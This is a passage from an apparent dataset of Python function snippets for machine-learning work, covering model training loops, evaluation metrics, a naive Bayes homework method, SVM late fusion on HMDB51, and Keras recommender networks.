Y_fromX, X_fromY, pred, targets, data.size(1), outp, outp_fromY, lenth, epoch_number)\r\n total_loss += loss.data\r\n total_spl += sparse_loss.data\r\n total_xrl += x_re_loss.data\r\n total_Xrl += X_re_loss.data\r\n total_Yrl += Y_re_loss.data\r\n total_cl += class_loss.data\r\n total_ol += outp_loss.data\r\n\r\n prediction = torch.max(output_flat, 1)[1]\r\n total_correct += torch.sum((prediction == targets).float())\r\n\r\n ave_loss = total_loss / (len(data_val) // args.batch_size)\r\n ave_spl = total_spl / (len(data_val) // args.batch_size)\r\n ave_xrl = total_xrl / (len(data_val) // args.batch_size)\r\n ave_Xrl = total_Xrl / (len(data_val) // args.batch_size)\r\n ave_Yrl = total_Yrl / (len(data_val) // args.batch_size)\r\n ave_cl = total_cl / (len(data_val) // args.batch_size)\r\n ave_ol = total_ol / (len(data_val) // args.batch_size)\r\n\r\n if epoch_number is 15:\r\n f = open(\"../Y.pkl\",\"wb\")\r\n pkl.dump(Ysave, f)\r\n f.close()\r\n return ave_loss, total_correct.data[0] / len(data_val), ave_spl, ave_xrl, ave_Xrl,ave_Yrl, ave_cl, ave_ol", "def learn(self, Xtrain, ytrain):\n\n ### YOUR CODE HERE\n \n self.numfeatures = Xtrain.shape[1]\n numsamples = Xtrain.shape[0]\n #print (self.numfeatures)\n count = 0\n for i in ytrain:\n if (i>count):\n count+=1\n self.numclasses = count + 1\n \n if(self.params['usecolumnones']==False):\n b = np.ones((numsamples, self.numfeatures-1))\n b = Xtrain[:,:-1]\n Xtrain = b\n self.numfeatures -= 1\n # print(Xtrain.shape[1])\n\n ### END YOUR CODE\n\n origin_shape = (self.numclasses, self.numfeatures)\n self.means = np.zeros(origin_shape)\n self.stds = np.zeros(origin_shape)\n\n ### YOUR CODE HERE\n countclass = np.zeros(self.numclasses)\n for i in range (0, numsamples):\n k = int(ytrain[i])\n countclass[k] += 1\n for j in range (0, self.numfeatures):\n self.means[k][j]+=Xtrain[i][j]\n \n for i in range (0, self.numclasses):\n #np.true_divide(self.means[i], countclass[i])\n for j in range (0, self.numfeatures):\n self.means[i][j] = self.means[i][j]/(countclass[i]+1e-8)\n \n self.yprob = np.true_divide(countclass, numsamples)\n \n for i in range (0, numsamples):\n k = int(ytrain[i])\n for j in range (0, self.numfeatures):\n self.stds[k][j]+= (Xtrain[i][j] - self.means[k][j])**2\n # print (self.stds)\n \n for i in range (0, self.numclasses):\n #np.true_divide(self.stds[i], countclass[i])\n for j in range (0, self.numfeatures):\n self.stds[i][j] = self.stds[i][j]/(countclass[i]+1e-8)\n \n # print (self.means)\n # print (self.stds)\n ### END YOUR CODE\n\n assert self.means.shape == origin_shape\n assert self.stds.shape == origin_shape", "def compute_test():\n model.eval()\n sets = list(features.keys())\n for dset, loaders in zip(sets, [train_loaders, val_loaders, test_loaders]):\n final_specific_loss = 0\n final_total_loss = 0\n for loader in loaders:\n loader_total_loss = 0\n loader_specific_loss = 0\n for data in loader:\n output = model(data.to(device))\n specific_loss = specific_loss_torch_geom(output, (data.pos, data.y),\n data.batch, batch_sizes[dset]).detach()\n loader_specific_loss += specific_loss\n loader_total_loss += torch.mean(specific_loss)\n # Average the loss over each loader\n loader_specific_loss /= len(loader)\n loader_total_loss /= len(loader)\n # Average the loss over the different loaders\n final_specific_loss += loader_specific_loss / len(loaders)\n final_total_loss += loader_total_loss / len(loaders)\n del output, loader_specific_loss\n\n print(\"Test set results \", dset, \": loss= {:.4f}\".format(final_total_loss))\n print(dset, \": \", final_specific_loss)\n print(\"Results in log scale\", np.log10(final_specific_loss.detach().cpu()),\n np.log10(final_total_loss.detach().cpu().numpy()))\n if args.wandb:\n wandb.run.summary[\"test results\"] = np.log10(final_specific_loss.detach().cpu())\n # free unnecessary data\n\n\n final_specific_numpy = np.log10(final_specific_loss.detach().cpu())\n del final_total_loss, final_specific_loss\n torch.cuda.empty_cache()\n return final_specific_numpy", "def test_rnnslu(**kwargs):\n # process input arguments\n param = {\n 'fold': 3,\n 'lr': 0.1,\n 'verbose': True,\n 'decay': False,\n 'win': 3,\n 'nhidden': 300,\n 'seed': 345,\n 'emb_dimension': 50,\n 'nepochs': 60,\n 'normal': False,\n 'folder':'../result',\n 'longdependence':None,\n 'optimization':'Adagrad'\n }\n param_diff = set(kwargs.keys()) - set(param.keys())\n if param_diff:\n raise KeyError(\"invalid arguments:\" + str(tuple(param_diff)))\n param.update(kwargs)\n\n if param['verbose']:\n for k,v in param.items():\n print(\"%s: %s\" % (k,v))\n\n # create result folder if not exists\n check_dir(param['folder'])\n\n # load the dataset\n print('... loading the dataset')\n train_set, valid_set, test_set, dic = load_data(param['fold'])\n\n # create mapping from index to label, and index to word\n idx2label = dict((k, v) for v, k in dic['labels2idx'].items()) # change label2index - index2label\n idx2word = dict((k, v) for v, k in dic['words2idx'].items()) # change words2index - index2words\n\n # unpack dataset\n train_lex, train_ne, train_y = train_set\n valid_lex, valid_ne, valid_y = valid_set\n test_lex, test_ne, test_y = test_set \n\n train_lex = train_lex + test_lex\n train_y = train_y + test_y\n train_ne = train_ne + test_ne\n\n vocsize = len(dic['words2idx']) # # of words\n nclasses = len(dic['labels2idx']) # # of classes \n nsentences = len(train_lex) # # training sample [a batch is all the words in a sentence]\n\n ## get the label for (input,output) for test and valid set \n groundtruth_valid = [map(lambda x: idx2label[x], y) for y in valid_y]\n words_valid = [map(lambda x: idx2word[x], w) for w in valid_lex]\n\n # instanciate the model\n numpy.random.seed(param['seed'])\n random.seed(param['seed'])\n \n\n print('... building the model')\n lstm = LSTM(\n nh=param['nhidden'],\n nc=nclasses,\n ne=vocsize,\n de=param['emb_dimension'],\n cs=param['win'],\n normal=param['normal'],\n longdependence = param['longdependence'],\n optimization = param['optimization']\n )\n\n ## build the model for mini-batch\n # train with early stopping on validation set\n print('... training')\n best_f1 = -numpy.inf\n param['clr'] = param['lr']\n \n for epoch in range(param['nepochs']):\n\n param['ce'] = epoch\n tic = timeit.default_timer()\n print('epoch %i out of %i' %(epoch,param['nepochs']) )\n \n for i, (x, y) in enumerate(zip(train_lex, train_y)):\n input_length = len(x)\n lstm.train(x, y, param['win'], param['clr'])\n print('[learning] epoch %i >> %2.2f%%' % (\n epoch, (i + 1) * 100. / nsentences), end=' ')\n print('completed in %.2f (sec) <<\\r' % (timeit.default_timer() - tic), end='')\n\n # evaluation // back into the real world : idx -> words\n predictions_valid = [map(lambda x: idx2label[x],\n lstm.classify(numpy.asarray(\n contextwin(x, param['win'])).astype('int32')))\n for x in valid_lex]\n\n # evaluation // compute the accuracy using conlleval.pl\n res_valid = conlleval(predictions_valid,\n groundtruth_valid,\n words_valid,\n param['folder'] + '/current.valid.txt',\n param['folder'])\n\n if res_valid['f1'] > best_f1:\n\n best_f1 = res_valid['f1']\n\n if param['verbose']:\n print('NEW BEST: epoch', epoch,\n 'best test F1', res_valid['f1'])\n\n param['tf1'] = res_valid['f1']\n param['tp'] = res_valid['p']\n param['tr'] = res_valid['r']\n param['be'] = epoch\n else:\n if param['verbose']:\n print('')\n\n # learning rate decay if no improvement in 10 epochs\n if param['decay'] and abs(param['be']-param['ce']) >= 10:\n param['clr'] *= 0.5\n\n if param['clr'] < 1e-5:\n break\n \n\n print('BEST RESULT: epoch', param['be'],\n 'best test F1', param['tf1'],\n 'with the model', param['folder'])\n \n return lstm", "def __call__(self, epoch, update):\n ii=1\n count = 0\n list = []\n gradients_list = []\n metrics_list = []\n from_list = []\n step_list = []\n global_update_list = []\n while True:\n i, p = next(self.gen)\n if p.poll():\n grads = []\n for i, fs in enumerate(self.float_sizes):\n w = p.recv_bytes(fs * 4)\n grads.append(np.ndarray(self.shapes[i], np.float32, w))\n\n last_update, step, agnt_nr, metrics = p.recv()\n\n count += 1\n\n gradients_list.append(grads)\n metrics_list.append(metrics)\n from_list.append(agnt_nr)\n global_update_list.append(last_update)\n step_list.append(1)\n staleness = update - last_update\n else:\n ii += 1\n if ii % self.learners == 0:\n time.sleep(0.0001)\n if count == self.num:\n binning = 0\n for i in self.bins:\n if staleness >= i:\n binning += 1\n else:\n break\n self.bin_counts[binning] += 1\n logger.debug(\"staleness\", staleness, \"put in bin\", binning, flush=True)\n return gradients_list, from_list, global_update_list, step_list, metrics_list, binning, 2", "def run_cr_dblp(alpha=0.2, c=0.85, MaxIter=1000, epsilon=1e-15, q=121, s=0, d=19, k=10, dataset=\"../data/DBLP_NoN.npy\"):\n\n '''\n Load NoN data\n '''\n data = np.load(dataset).item()\n CoAuthorNets = data['CoAuthorNets']\n ConfNet = data['ConfNet']\n ConfDict = data['ConfDict']\n AuthorDict = data['AuthorDict']\n CoAuthorNetsID = data['CoAuthorNetsID']\n\n '''\n Rename networks\n '''\n G = sparse.csc_matrix(ConfNet) # the main network\n g = CoAuthorNets.shape[1]\n A = CoAuthorNets # the domain-specific networks\n A_ID = CoAuthorNetsID # the IDs of nodes in domain-specific networks\n\n '''\n Precomputation, this step only needs to be done once for a dataset\n '''\n PrecompFileName = 'Precomp_Values_DBLP.npy'\n\n if os.path.isfile(PrecompFileName):\n print(\"A precomputation file has been detected ...\")\n else:\n print(\"Precomputation starts ...\")\n Precomputation.precomputation(A, A_ID, G, PrecompFileName)\n\n print(\"Load the precomputation file ...\")\n data = np.load(PrecompFileName).item()\n I_n = data['I_n']\n Anorm = data['Anorm']\n Ynorm = data['Ynorm']\n\n '''\n Run CR\n '''\n # set initial scores\n start = time.time()\n\n vfunc = np.vectorize(lambda matrix: matrix.shape[0]) # define an element-wise operation\n DomainSizes = vfunc(A_ID) # the number of domain nodes in each domain-specific network\n\n e = np.array([]) # initialize query vector\n\n for i in range(g):\n\n tmp_e = np.zeros((DomainSizes[0, i],))\n\n if i == s:\n tmp_e[A_ID[0, i].ravel() == q] = 1 # use g to replace 1 if NoN size is large\n\n e = np.hstack((e, tmp_e))\n\n e = e.reshape(len(e), 1)\n e = sparse.csc_matrix(e)\n\n # CR\n [r, Objs, Deltas] = CR.cr(Anorm, Ynorm, I_n, e, alpha, c, MaxIter, epsilon)\n\n # sort ranking scores in the target domain-specific network\n st = np.sum(DomainSizes[0, 0:d])\n ed = np.sum(DomainSizes[0, 0:d+1])\n rd_idx = np.arange(st, ed)\n rd = r[rd_idx]\n\n Sort_rd = np.flip(np.sort(rd.todense().getA1()), axis=0)\n Sort_Idx = np.flip(np.argsort(rd.todense().getA1()), axis=0)\n\n TopKResults = Sort_Idx[0:k]\n TopKResults = A_ID[0, d][TopKResults, 0]\n\n end = time.time()\n Runtime = end - start\n\n print(\"The running time of CR is \" + str(Runtime) + \" seconds.\")\n\n TopKAuthorNames = AuthorDict[TopKResults - 1, 0]\n\n return TopKAuthorNames", "def train_and_score_xgb(network):\n\n df_all_train_x = pd.read_pickle('data/df_all_train_x.pkl.gz', compression='gzip')\n df_all_train_y = pd.read_pickle('data/df_all_train_y.pkl.gz', compression='gzip')\n df_all_train_actuals = pd.read_pickle('data/df_all_train_actuals.pkl.gz', compression='gzip')\n df_all_test_x = pd.read_pickle('data/df_all_test_x.pkl.gz', compression='gzip')\n df_all_test_y = pd.read_pickle('data/df_all_test_y.pkl.gz', compression='gzip')\n df_all_test_actuals = pd.read_pickle('data/df_all_test_actuals.pkl.gz', compression='gzip')\n\n train_y = df_all_train_y[0].values\n train_actuals = df_all_train_actuals[0].values\n train_log_y = safe_log(train_y)\n train_x = df_all_train_x.values\n test_actuals = df_all_test_actuals.values\n test_y = df_all_test_y[0].values\n test_log_y = safe_log(test_y)\n test_x = df_all_test_x.values\n\n # Use keras model to generate x vals\n mae_intermediate_model = load_model('models/mae_intermediate_model.h5')\n\n mae_vals_train = mae_intermediate_model.predict(train_x)\n mae_vals_test = mae_intermediate_model.predict(test_x)\n\n # train = xgb.DMatrix(mae_vals_train, label=train_log_y)\n # test = xgb.DMatrix(mae_vals_test)\n\n model = compile_model(network)\n\n print('\\rNetwork')\n\n for property in network:\n print(property, ':', network[property])\n logging.info('%s: %s' % (property, network[property]))\n\n\n eval_set = [(mae_vals_test, test_log_y)]\n model.fit(mae_vals_train, train_log_y, early_stopping_rounds=5, eval_metric='mae', eval_set=eval_set)\n # , verbose=False)\n\n # eval_set = [(test, test_log_y)]\n # xgb.train(network, train, num_boost_round=5000, evals=eval_set, early_stopping_rounds=5)\n\n\n predictions = model.predict(mae_vals_test)\n # predictions = xgb.predict(test)\n score = mean_absolute_error(test_log_y, predictions)\n\n print('\\rResults')\n\n best_round = model.best_iteration\n # best_round = xgb.best_iteration\n\n if np.isnan(score):\n score = 9999\n\n print('best round:', best_round)\n print('loss:', score)\n print('-' * 20)\n\n logging.info('best round: %d' % best_round)\n logging.info('loss: %.4f' % score)\n logging.info('-' * 20)\n\n return score", "def test_normalization(self):\n Number_of_tests = 1000\n low = -1000\n high = 1000\n for i in range(Number_of_tests):\n x = np.random.rand(100) * (high - low) + low\n y = aux_functions.softmax_base(x)\n result = np.sum(y)\n nptest.assert_almost_equal(result, 1.0)", "def train_step(self,\n x,\n y,\n b,\n w):\n\n statistics = dict()\n\n for i in range(self.bootstraps):\n fm = self.forward_models[i]\n fm_optim = self.forward_model_optims[i]\n\n with tf.GradientTape(persistent=True) as tape:\n\n # calculate the prediction error and accuracy of the model\n d = fm.get_distribution(x, training=True)\n nll = -d.log_prob(y)[:, 0]\n\n # evaluate how correct the rank fo the model predictions are\n rank_correlation = spearman(y[:, 0], d.mean()[:, 0])\n\n # build the total loss and weight by the bootstrap\n total_loss = tf.math.divide_no_nan(tf.reduce_sum(\n w[:, 0] * b[:, i] * nll), tf.reduce_sum(b[:, i]))\n\n grads = tape.gradient(total_loss, fm.trainable_variables)\n fm_optim.apply_gradients(zip(grads, fm.trainable_variables))\n\n statistics[f'oracle_{i}/train/nll'] = nll\n statistics[f'oracle_{i}/train/rank_corr'] = rank_correlation\n\n return statistics", "def calcError(net, net_labels, dataset_name, dataloader, dataset, doGPU):\n # note: net_labels is a list of pairs (RAP_name, PETA_name) of attribute names\n net_attr_nbr = len(net_labels)\n assert (net_attr_nbr == 49)\n \n total = 0\n correct = 0\n batch_nbr = 0\n per_attrib_total = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_correct = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_1_pred = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_class_accuracy = torch.zeros([net_attr_nbr], dtype=torch.float) # size [92]\n if doGPU:\n per_attrib_total = per_attrib_total.cuda()\n per_attrib_correct = per_attrib_correct.cuda()\n per_attrib_1_pred = per_attrib_1_pred.cuda()\n per_attrib_class_accuracy = per_attrib_class_accuracy.cuda()\n \n with torch.no_grad():\n # loop over batches\n # accumulate per-attribute and total number of correct predictions\n for i_batch, sample_batched in enumerate(dataloader):\n assert (sample_batched['image'].shape[1:] == (3,128,48)), \"wrong image size\"\n batch_nbr += 1\n real_batch_size = sample_batched['image'].shape[0]\n total += real_batch_size * net_attr_nbr\n per_attrib_total += real_batch_size # size [net_attr_nbr]\n assert (per_attrib_total.sum().item() == total)\n try:\n assert (batch_nbr == math.ceil(per_attrib_total[0].item()/Param_Batchsize))\n except AssertionError:\n ipdb.set_trace()\n pass\n\n\n # prepare data for prediction\n if doGPU:\n inp = Variable(sample_batched['image'].float().cuda())\n else:\n inp = Variable(sample_batched['image'].float())\n\n # retrieve ground truth\n dataset_lab_gt = sample_batched['label'] # shape == [50,NB_ATTRIB]\n\n # convert ground truth to model attributes\n if dataset_name == 'datasetRAPPETA':\n assert (dataset_lab_gt.shape[1] == 49)\n # no conversion needed, use ground truth as it is\n lab_gt = dataset_lab_gt\n elif dataset_name == 'datasetRAP':\n assert (dataset_lab_gt.shape[1] == 92)\n # note: in the line below dataset_lab_gt.shape[0] is better than \n # Param_Batchsize because the last batch may be incomplete\n lab_gt = torch.zeros((dataset_lab_gt.shape[0],net_attr_nbr), dtype=dataset_lab_gt.dtype)\n net_labels_RAP = [rap_label for rap_label,peta_label in net_labels]\n for attr_idx,attr_name in enumerate(net_labels_RAP):\n lab_gt[:,attr_idx] = dataset_lab_gt[:,dataset.index_of(attr_name)]\n elif dataset_name == 'datasetPETA':\n assert (dataset_lab_gt.shape[1] == 104)\n # note: in the line below dataset_lab_gt.shape[0] is better than \n # Param_Batchsize because the last batch may be incomplete\n lab_gt = torch.zeros((dataset_lab_gt.shape[0],net_attr_nbr), dtype=dataset_lab_gt.dtype)\n net_labels_PETA = [peta_label for rap_label,peta_label in net_labels]\n for attr_idx,attr_name in enumerate(net_labels_PETA):\n lab_gt[:,attr_idx] = dataset_lab_gt[:,dataset.index_of(attr_name)]\n else:\n print('Unknown dataset \\'' + dataset_name + '\\'')\n sys.exit(1)\n\n # 'format' ground truth for Torch\n lab_gtv = Variable(lab_gt)\n if doGPU:\n lab_gtv = lab_gtv.cuda()\n\n # do prediction\n logits = net.forward(inp) # output without Sigmoid\n predictions = (logits > 0).int() # size [50, net_attr_nbr]\n assert (net_attr_nbr == predictions.shape[1])\n\n # accumulate total number of correct predictions\n correct += (lab_gtv == predictions).sum()\n\n # accumulate per-attribute number of correct predictions\n per_batch_and_attrib_correct = (lab_gtv == predictions) # size [50, net_attr_nbr]\n #if doGPU:\n # per_batch_and_attrib_correct = per_batch_and_attrib_correct.cpu()\n per_attrib_correct += per_batch_and_attrib_correct.sum(0) # size [net_attr_nbr]\n assert (per_attrib_correct.sum().item() == correct)\n\n # accumulate number of 1 predictions for each attribute\n per_attrib_1_pred += predictions.sum(0) # size [net_attr_nbr]\n\n # accumulate for class-accuracy\n per_batch_and_attrib_1_good_prediction = (predictions.byte() * per_batch_and_attrib_correct).sum(0) #size [net_attr_nbr]\n per_batch_and_attrib_0_good_prediction = ((1 - predictions.byte()) * per_batch_and_attrib_correct).sum(0) #size [net_attr_nbr]\n assert torch.equal(per_batch_and_attrib_1_good_prediction + per_batch_and_attrib_0_good_prediction, per_batch_and_attrib_correct.sum(0))\n per_batch_and_attrib_1_ground_truth = lab_gtv.sum(0) #size [net_attr_nbr]\n per_batch_and_attrib_0_ground_truth = (1 - lab_gtv).sum(0) #size [net_attr_nbr]\n try:\n assert torch.equal(per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth, torch.tensor([real_batch_size] * net_attr_nbr).cuda())\n except AssertionError:\n print(\"per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth=\")\n print(per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth)\n ipdb.set_trace()\n pass\n\n per_batch_and_attrib_recall_1 = per_batch_and_attrib_1_good_prediction.float() / per_batch_and_attrib_1_ground_truth.float() #size [net_attr_nbr]\n # nan values appear when ground_truth number of 1 value is 0\n # in this case, good_prediction can not be different of 0\n # (there can not be a good prediction of 1 because there is not\n # any 1 in the ground truth)\n # so a nan appears only when recall = 0 good pred / 0 case in ground truth\n # so recall=nan can be safely replaced by a recall=1\n person.replace_nan_by_one(per_batch_and_attrib_recall_1)\n per_batch_and_attrib_recall_0 = per_batch_and_attrib_0_good_prediction.float() / per_batch_and_attrib_0_ground_truth.float() #size [net_attr_nbr]\n person.replace_nan_by_one(per_batch_and_attrib_recall_0)\n # class_accuracy = mean(recall_of_0, recall_of_1)\n per_batch_and_attrib_class_accuracy = (per_batch_and_attrib_recall_0 + per_batch_and_attrib_recall_1) / 2.0 #size [net_attr_nbr]\n per_attrib_class_accuracy += per_batch_and_attrib_class_accuracy #size [net_attr_nbr]\n\n assert (total == (dataloader.dataset.__len__() * net_attr_nbr))\n \n if doGPU:\n per_attrib_total = per_attrib_total.cpu()\n per_attrib_correct = per_attrib_correct.cpu()\n per_attrib_1_pred = per_attrib_1_pred.cpu()\n per_attrib_class_accuracy = per_attrib_class_accuracy.cpu()\n\n # compute per-attribute and global average prediction error\n err = (1.0-correct.item()/total)\n per_attrib_err = (1.0 - (per_attrib_correct.to(dtype=torch.float) / per_attrib_total.to(dtype=torch.float))) # size [net_attr_nbr]\n np.testing.assert_allclose(per_attrib_err.mean().item(), err, rtol=1e-5)\n\n # compute per-attribute number of 1 predictions\n per_attrib_1_pred_rate = 100 * (per_attrib_1_pred.to(dtype=torch.float) / per_attrib_total.to(dtype=torch.float)) # size [net_attr_nbr]\n\n # compute mean class_accuracy over batches\n per_attrib_class_accuracy = per_attrib_class_accuracy * 1.0 / batch_nbr \n\n return err, per_attrib_err, per_attrib_1_pred_rate, per_attrib_class_accuracy", "def train(nz=100, lr=0.0002, batchSize=64, epoch=10, outDir='../Experiment/wgan'):\n\t# load the images for training\n\tif opts.celeba : \n\t\txTrain = load_CelebA()\n\tif opts.mnist : \n\t\txTrain,_,_,_,_,_ = load_MNIST()\n\tprint 'Images for training -- shape:{}, min:{}, max:{} '.format(np.shape(xTrain), np.min(xTrain), np.max(xTrain))\n\n\ttrain_fns, test_fns, G, D = prep_train(nz=nz, lr=lr)\n\n\tsn,sc,sx,sy=np.shape(xTrain)\n\tbatches=int(np.floor(float(sn)/batchSize))\n\n\t#keep training info\n\tg_cost=[]\n\td_cost=[]\n\n\ttimer=time.time()\n\t#Train D (outerloop)\n\tprint 'epoch \\t batch \\t cost G \\t cost D \\t time (s)'\n\tfor e in range(epoch):\n\t\t#Do for all batches\n\t\tfor b in range(batches):\n\t\t\tZ = np.random.normal(loc=0.0, scale=1.0, size=(sn,nz)).astype(floatX) \n\t\t\tcost_D=train_fns['dis'](xTrain[b*batchSize:(b+1)*batchSize],Z[b*batchSize:(b+1)*batchSize])\n\t\t\tcost_G=train_fns['gen'](Z[b*batchSize:(b+1)*batchSize])\n\t\t\tprint e,'\\t',b,'\\t',cost_G,'\\t', cost_D,'\\t', time.time()-timer\n\t\t\ttimer=time.time()\n\t\t\tg_cost.append(cost_G)\n\t\t\td_cost.append(cost_D)\n\n\n\t#save plot of the cost\n\tplt.plot(range(batches*epoch),g_cost, label=\"G\")\n\tplt.plot(range(batches*epoch),d_cost, label=\"D\")\n\tplt.legend()\n\tplt.xlabel('epoch')\n\tplt.savefig(os.path.join(outDir,'cost_regular.png'))\n\n\treturn train_fns, test_fns, G, D", "def evaluate_hmdb51_fusion():\n vlen = 0\n ob_suffix = '-max.feat.npy.gz'\n fv_suffix = '_fv.npy.gz'\n ob_root = '/home/syq/research_final/data/features/ob_hmdb51_pooled_python/'\n fv_root = '/home/syq/research_final/data/dense-traj/fv_hmdb51_python/'\n hmdb_splits = 'testTrainMulti_7030_splits/'\n categories = os.listdir(fv_root)\n weight = 1.0\n weights = [i / 20.0 for i in range(21)]\n acc_to_weights = {}\n\n for weight in weights:\n print \"Weight: %.2f\" % weight\n accs = np.zeros(3)\n for splitnum in range(1,4):\n ts = time.time()\n trainfiles, testfiles = hmdb51_splits.loadsplit(categories,\n hmdb_splits,\n splitnum)\n print 'Have %d train files' % len(trainfiles)\n print 'Have %d test files' % len(testfiles)\n\n if not vlen:\n fp = gzip.open(os.path.join(ob_root,'%s%s'%(trainfiles[0][0][:-4],\n ob_suffix)),\"rb\")\n vlen_ob = len(np.load(fp))\n fp.close()\n print \"OB vector length is %d\" % vlen_ob\n fp = gzip.open(os.path.join(fv_root,'%s%s'%(trainfiles[0][0][:-4],\n fv_suffix)),\"rb\")\n vlen_fv = len(np.load(fp))\n fp.close()\n print \"IDTFV vector length is %d\" % vlen_fv\n\n Dtrain_ob = np.zeros( (len(trainfiles),vlen_ob), np.float32 )\n Dtrain_fv = np.zeros( (len(trainfiles),vlen_fv), np.float32 )\n\n Ytrain = np.ones ( (len(trainfiles) )) * -1000\n\n for fi,f in enumerate(trainfiles):\n fp = gzip.open(os.path.join(ob_root,'%s%s'%(f[0][:-4],\n ob_suffix)),\"rb\")\n Dtrain_ob[fi][:] = np.load(fp)\n fp.close()\n Ytrain[fi] = f[1]\n\n fp = gzip.open(os.path.join(fv_root,'%s%s'%(f[0][:-4],\n fv_suffix)),\"rb\")\n Dtrain_fv[fi][:] = np.load(fp)\n fp.close()\n\n Dtest_ob = np.zeros( (len(testfiles),vlen_ob), np.float32 )\n Dtest_fv = np.zeros( (len(testfiles),vlen_fv), np.float32 )\n\n Ytest = np.ones ( (len(testfiles) )) * -1000\n\n for fi,f in enumerate(testfiles):\n fp = gzip.open(os.path.join(ob_root,'%s%s'%(f[0][:-4],\n ob_suffix)),\"rb\")\n Dtest_ob[fi][:] = np.load(fp)\n fp.close()\n Ytest[fi] = f[1]\n\n fp = gzip.open(os.path.join(fv_root,'%s%s'%(f[0][:-4],\n fv_suffix)),\"rb\")\n Dtest_fv[fi][:] = np.load(fp)\n fp.close()\n\n \"\"\"\n Early fusion\n Dtrain = np.hstack((Dtrain_ob, Dtrain_fv))\n Dtest = np.hstack((Dtest_ob, Dtest_fv))\n\n clf = OneVsRestClassifier(estimator=LinearSVC(C=100), n_jobs=8)\n acc = clf.fit(Dtrain, Ytrain).score(Dtest, Ytest)\n \"\"\"\n fv_clf = OneVsRestClassifier(estimator=LinearSVC(C=100), n_jobs=8)\n\n ob_clf = OneVsRestClassifier(estimator=SVC(C=10,\n cache_size=1000,\n kernel='linear',\n probability=True),\n n_jobs=-1)\n\n # Get probabilities for late fusion\n Dtrain_fv = fv_clf.fit(Dtrain_fv, Ytrain).decision_function(Dtrain_fv)\n Dtrain_ob = ob_clf.fit(Dtrain_ob, Ytrain).decision_function(Dtrain_ob)\n Dtest_fv = fv_clf.decision_function(Dtest_fv)\n Dtest_ob = ob_clf.decision_function(Dtest_ob)\n\n # Scale decision values b/w 0 and 1\n Dtrain_fv = preprocessing.normalize(Dtrain_fv)\n Dtrain_ob = preprocessing.normalize(Dtrain_ob)\n Dtest_fv = preprocessing.normalize(Dtest_fv)\n Dtest_ob = preprocessing.normalize(Dtest_ob)\n\n # Late fusion\n scores_train = (Dtrain_fv * weight) + (Dtrain_ob * (1 - weight))\n latefusion_clf = OneVsRestClassifier(estimator=LinearSVC(C=100), n_jobs=-1)\n latefusion_clf.fit(scores_train, Ytrain)\n\n scores_test = (Dtest_fv * weight) + (Dtest_ob * (1 - weight))\n acc = latefusion_clf.score(scores_test, Ytest)\n print 'Fold', splitnum, 'late fusion acc', acc\n print \"Train & testing time %.3f\" % (time.time() - ts)\n accs[splitnum-1] = acc\n acc_to_weights[weight] = accs\n\n print \"Mean accuracy: %.3f\" % accs.mean()\n with open(\"hmdb51_weight_gridsearch.txt\", \"w\") as f:\n for weight, accs in acc_to_weights.items():\n f.write(str(weight) + str(accs) + '\\n')\n return acc_to_weights\n\n \"\"\"\n with open('fv_hmdb51_accs.txt', 'w') as f:\n f.write(\"%s\\nMean:%.3f\" % (str(accs), np.mean(accs)))\n \"\"\"", "def test_pretrained():\n\n model = get_model()\n nums = generate_numbers()\n b = get_B(base=10, precision=[7, -9], size=1)[0]\n X = np.zeros((len(nums), 2 * len(b)))\n Y = np.zeros((len(nums), 1))\n\n for i, num in enumerate(nums):\n X[i] = encode(num, b)\n Y[i][0] = num\n\n loss = model.evaluate(x=X, y=Y)\n\n assert loss < 1e-5", "def computeNN(train, test):\n \n shallow_NN = test[['user_id', 'movie_id']].copy()\n deep_NN = test[['user_id', 'movie_id']].copy()\n \n categorical_train_y = np.zeros([train.shape[0], 5])\n categorical_train_y[np.arange(train.shape[0]), train.rating - 1] = 1\n\n\n categorical_test_y = np.zeros([test.shape[0], 5])\n categorical_test_y[np.arange(test.shape[0]), test.rating - 1] = 1\n \n n_items = 1000\n n_users = 10000\n \n \n def shallow_net():\n features = 48\n\n input_i = layers.Input(shape=[1])\n i = layers.Embedding(n_items + 1, features)(input_i)\n i = layers.Flatten()(i)\n i = layers.normalization.BatchNormalization()(i)\n\n input_u = layers.Input(shape=[1])\n u = layers.Embedding(n_users + 1, features)(input_u)\n u = layers.Flatten()(u)\n u = layers.normalization.BatchNormalization()(u)\n\n nn = layers.concatenate([i, u])\n\n nn = layers.Dense(512, activation='relu')(nn)\n nn = layers.Dropout(0.5)(nn)\n nn = layers.normalization.BatchNormalization()(nn)\n\n nn = layers.Dense(128, activation='relu')(nn)\n\n output = layers.Dense(5, activation='softmax')(nn)\n\n model = models.Model([input_i, input_u], output)\n model.compile(optimizer='adamax', loss='categorical_crossentropy')\n return model\n \n def deep_net():\n features = 48\n\n input_i = layers.Input(shape=[1])\n i = layers.Embedding(n_items + 1, features)(input_i)\n i = layers.Flatten()(i)\n i = layers.normalization.BatchNormalization()(i)\n\n input_u = layers.Input(shape=[1])\n u = layers.Embedding(n_users + 1, features)(input_u)\n u = layers.Flatten()(u)\n u = layers.normalization.BatchNormalization()(u)\n\n nn = layers.concatenate([i, u])\n\n nn = layers.Dense(1024, activation='relu')(nn)\n nn = layers.Dropout(0.5)(nn)\n nn = layers.normalization.BatchNormalization()(nn)\n nn = layers.Dense(512, activation='relu')(nn)\n nn = layers.Dropout(0.5)(nn)\n nn = layers.normalization.BatchNormalization()(nn)\n nn = layers.Dense(256, activation='relu')(nn)\n nn = layers.Dropout(0.5)(nn)\n nn = layers.normalization.BatchNormalization()(nn)\n nn = layers.Dense(128, activation='relu')(nn)\n\n output = layers.Dense(5, activation='softmax')(nn)\n\n model = models.Model([input_i, input_u], output)\n model.compile(optimizer='adamax', loss='categorical_crossentropy')\n\n return model\n\n model_deep = deep_net()\n model_shallow = shallow_net()\n print (\"Starting to compute shallow neural network...\")\n model_shallow.fit([train.movie_id, train.user_id], y=categorical_train_y, batch_size=20480, epochs=20)\n pred_shallow = model_shallow.predict([test.movie_id, test.user_id])\n print (\"... Finished sucessfully\")\n \n print (\"Starting to compute deep neural network...\")\n model_deep.fit([train.movie_id, train.user_id], y=categorical_train_y, batch_size=20480, epochs=20)\n pred_deep = model_deep.predict([test.movie_id, test.user_id])\n print (\"... Finished sucessfully\")\n \n \n shallow_NN['NN_shallow_rating'] = 